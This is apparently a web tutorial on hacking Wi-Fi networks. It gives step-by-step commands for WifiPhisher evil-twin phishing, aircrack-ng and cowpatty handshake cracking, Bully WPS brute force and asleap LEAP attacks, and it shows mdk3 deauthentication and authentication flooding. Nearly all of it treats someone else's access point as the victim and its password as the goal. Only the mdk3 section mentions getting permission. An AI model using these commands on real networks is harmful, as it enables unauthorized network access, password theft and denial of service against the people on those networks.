Wireless AttackLot's of user asked me about wifi hacking like:
- How to hack wifi using social engineering technique or phishing technique.
- How to hack wifi using kali linux terminal.
- How to Crack WEP protected Wifi.
- How to Crack WPA/WPA2 Protected Wi-Fi using dictionary.
- How to Crack WPA/WPA2 Protected Wi-Fi without dictionary.
- And Hack wifi using tools such as hack wifi via WifiPhisher|Aircrack-ng |Asleap|Bully|coWPAtty|eapmd5pass|Fern-wifi-cracker|kismet|giskismet|mdk3|Wifi-honey|Wifitap|Wifite.
Some of the common network attacks have been outlined below.
- Rogue access points
- Evil twin
- Packet sniffing
- War driving
- Replay attacks
- Near field communication
- WPS attacks
- WEP/WPA attacks
802.11 Wireless Tools
In this text, when we are discussing wireless security we are referring to 802.11 networks. 802.11, or the Institute of Electrical and Electronic Engineers (IEEE) 802.11, which is a set of standards for radio communications used in wireless local area networks, or WLANs. IEEE is an organization composed of engineers, scientists and students that specialize in creating standards for the computer and electronics industry in order to ensure smooth operability and compatibility. The organization uses a number system to represent the standards it comes up with for different technologies. IEEE uses the number 802 to categorize standards for local and wide area networks, while the number 11 narrows that down to wireless area networks. In our discussions, you will also notice certain letters that appear after the number 11. These letters represent the different versions of the protocol, which specify things such as what frequency they operate in, and bandwidth they employ. These letters can also specify different security methods, as well.
802.11 networks are everywhere. The number of shipped 802.11-enabled hardware devices is estimated to exceed 40 million units by the year 2006 (Vladimirov, Gavrilenko, Mikhailovsky). Because of the popularity of this communications standard and its prevalence in the world of organizational wireless networking, our focus in this text will be primarily on 802.11 WLANs. By familiarizing yourself with the various aspects of the 802.11 standards, you will also be familiarizing yourself with the same technologies that are employed within the business world.
How to Hack The WIFI Using WifiPhisher
Wireless Device can be hacked using various tools some of the tools are given below:
Step 1: Download WifiPhisher file from github
git clone https://github.com/sophron/wifiphisher.git
Step 2: Navigate to the Directory
Next, navigate to the directory that Wifiphisher created when it was unpacked. In my case, it is /wifiphisher-1.1.
Step 3:Run wifiphisher.py script using command
sudo python wifiphisher.py
Step 4:Wifiphisher.py require the additional file to run script ,allow wifiphisher to download file
Step 5:Now disconnect both the wifi from internet and rerun the script using command given below:
sudo python wifiphisher.py
Step 6: Send Your Attack & Get the Password
Go ahead and hit Ctrl + C on your keyboard and you will be prompted for the number of the AP that you would like to attack. In my case, it is 1.
Now wifiphisher, deauth|disconnect the all device connected to victim wifi access point and starting the fake access point
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
How to Hack WPA/WPA2 Protected Wi-Fi Using aircrack-ng
1.Put your wireless card in monitoring mode
airmon-ng start wlan0
2.Command to listen to the wireless network around you and get details about them
3. Sniff on channel 6 (-c 3), filtering on a BSSID (–bssid 11:22:33:44:55:66 ), writing the capture to disk (-w capture), using the monitor mode interface (mon0):
airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
( eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
4.Using the provided wordlist (-w /usr/share/wordlists/nmap.lst), attempt to crack passwords in the capture file
aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap
[ -w=The name of the dictionary file
-b=The MAC address of the access point
MTNL.cap=The name of the file that contains the authentication handshake ]
Demonstrates a serious deficiency in proprietary Cisco LEAP networks. Since LEAP uses a variant of MS-CHAPv2 for the authentication exchange, it is susceptible to accelerated offline dictionary attacks. Asleap can also attack the Point-to-Point Tunneling Protocol (PPTP), and any MS-CHAPv2 exchange where you can specify the challenge and response values on the command line.
We are assuming you've run kismet on the site and determined they are using LEAP. Kismet will create a .dump file in the local directory from which you are running the tool. Within this dump file are the LEAP challenge and responses. Depending on the amount of traffic, you will get either of these responses from ASLEAP:
asleap -r Kismet-Apr-29-2008-1.dump
If user found challenge and responses in dump file then user can run a dictionary against the LEAP exchange. Prior to version 1.4 of asleap, you would have to use genkeys to generate a lookup file. Version 1.4 allows you to provide a ASCII dictionary directly with the -W option.
asleap -r Kismet-Apr-29-2008-1.dump -W some_dictionary.txt
Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
Hack Wifi Using Bully
Put Your Wi-Fi Adapter in Monitor Mode
airmon-ng start wlan0
Next, we need to use Airdump-ng to see the info on the wireless AP around us.
Use Airdump-Ng to Get the Necessary Info
Finally, all we need to do is to put this info into our Bully command.
bully mon0 -b 00:25:9C:97:4F:48 -e abcd -c1
Let's break down that command to see what's happening.
mon0 is the name of the wireless adapter in monitor mode.
--b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
-e abcd is the SSID of the AP.
-c 1 is the channel the AP is broadcasting on.
Hack wifi using coWPAtty
Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed.
Command to crack WPA & WPA2 using cowpatty
airmon-ng start wlan0
airodump-ng -c [channel id] --write news --bssid [bssid of the wifi] mon0
Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
cowpatty -f darkc0de.lst -r news -s [ESSID of the wifi]
As you can see in the screenshot above, cowpatty is generating a hash of every word on our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it dsplays the password of the AP
EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate using EAP-MD5 subject themselves to an offline dictionary attack vulnerability. This tool reads from a live network interface in monitor-mode, or from a stored libpcap capture file, and extracts the portions of the EAP-MD5 authentication exchange. Once the challenge and response portions have been collected from this exchange, eapmd5pass will mount an offline dictionary attack against the user’s password.
Hack wifi using tool Fern-wifi-cracker
Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks
1.Put the wireless card into monitor mode
airmon-ng start wlan0
Launch the Fern wifi cracker using below command
Click the drop down menu at the top of Fern and select your wireless adapter from this list.
Click OK to any message boxes you get. After a few moments, the message Monitor Mode Enabled on… should appear in green.
Then click Scan for Access Points.
Fern will scan for WiFi networks in range, and will begin populating the WEP and WPA boxes.
Once the the Fern WiFi Cracker finishes scanning for networks, you can select the network you are targeting by finding it in either the WEP section or the WPA section. In this
example, I am targeting a WEP encrypted network
You will have to select your target network from the drop down box and then clicking the WiFi Attack button to the right.
Kismet is an 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It will work with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11a/b/g/n traffic. It can use other programs to play audio alarms for network events, read out network summaries, or provide GPS coordinates. This is the main package containing the core, client, and server.
GISKismet is a wireless recon visualization tool to represent data gathered using Kismet in a flexible manner. GISKismet stores the information in a database so that the user can generate graphs using SQL. GISKismet currently uses SQLite for the database and GoogleEarth / KML files for graphing.
Use mdk3 to hack wifi
MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it.
SSID Flooding with MDK3
One neat trick that MDK3 can do is SSID flooding, or beacon flooding. What this means is that MDK3 can broadcast hundreds or even thousands of fake access points.
mdk3 <interface> b -c 1
Authentication Flooding with MDK3
The idea behind authentication flooding is simple. Too many authentication requests at one time may cause the wireless access point to freeze up and perhaps stop working entirely
mdk3 <interface> a -a <ap_mac address>
Deauthentication Flooding with MDK3
The DoS WiFi hacking technique that works best uses deauthenticate requests rather than faking authentication requests.
mdk3 <interface> d -b blacklist_file
Read from a file containing MAC addresses to attack (Blacklist Mode)
This script creates five monitor mode interfaces, four are used as APs and the fifth is used for airodump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.
Broadcast the given ESSID (FreeWiFi) on channel 6 (6) using the wireless interface (wlan0):
root@kali:~# wifi-honey FreeWiFi 6 wlan0
Wifitap is a proof of concept for communication over WiFi networks using traffic injection.
Wifitap allows any application do send and receive IP packets using 802.11 traffic capture and injection over a WiFi network simply configuring wj0, which means :
Setting an IP address consistent with target network address range
routing desired traffic through it
In particular, it’s a cheap method for arbitrary packets injection in 802.11 frames without specific library.
In addition, it will allow one to get rid of any limitation set at access point level, such as bypassing inter-client communications prevention systems (e.g. Cisco PSPF) or reaching multiple SSID handled by the same access point.
Wifite tools to hack wifi
To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool.
Launch the wifite using command
After launching the application wifite will start scanning the wireless access point ,Press ctrl+c to select the target
Then select the target number and hit enter, eg:1
Now all the rest of work from capturing the handshake to crack the password will done by wifite itself